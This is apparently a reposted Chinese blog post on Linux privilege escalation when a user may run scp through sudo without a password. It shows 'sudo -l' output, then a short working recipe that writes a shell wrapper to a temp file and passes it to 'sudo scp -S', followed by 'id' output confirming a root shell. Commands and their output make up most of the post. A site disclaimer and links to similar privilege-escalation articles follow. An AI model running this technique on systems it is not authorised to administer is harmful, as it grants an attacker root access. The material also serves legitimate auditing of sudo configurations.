sudo-scp提權

本文轉載自查看原文 2021-03-31 18:36 422 權限提升

當scp命令有免密sudo的權限時，可以用來進行提權到其他賬號

1、確認scp有sudo免密權限

test@test:~$ sudo -l
sudo -l
Matching Defaults entries for test on test:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hacksudo may run the following commands on test:
    (root) NOPASSWD: /usr/bin/scp

2、輸入下列命令，即可完成提權

$ TF=$(mktemp)
$ echo 'sh 0<&2 1>&2' > $TF
$ chmod +x "$TF"
$ sudo scp -S $TF x y:

id
uid=0(root) gid=0(root) groups=0(root)

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 sudo提權復現（CVE-2019-14187） sudo+SETENV(環境變量)提權 Linux sudo堆溢出本地提權漏洞安全風險通告解決方案 Ubuntu無法sudo提權，報當前用戶不在sudoers文件中錯誤 2019-10-16，sudo提權漏洞（CVE-2019-14287）實現 pkexec提權（限制條件：用戶必須在sudo組里且知道用戶密碼） Linux提權之SUID提權 Mysql提權-基於Mysql的webshell提權 Mysql的udf提權於mof提權 FileZilla提權的過程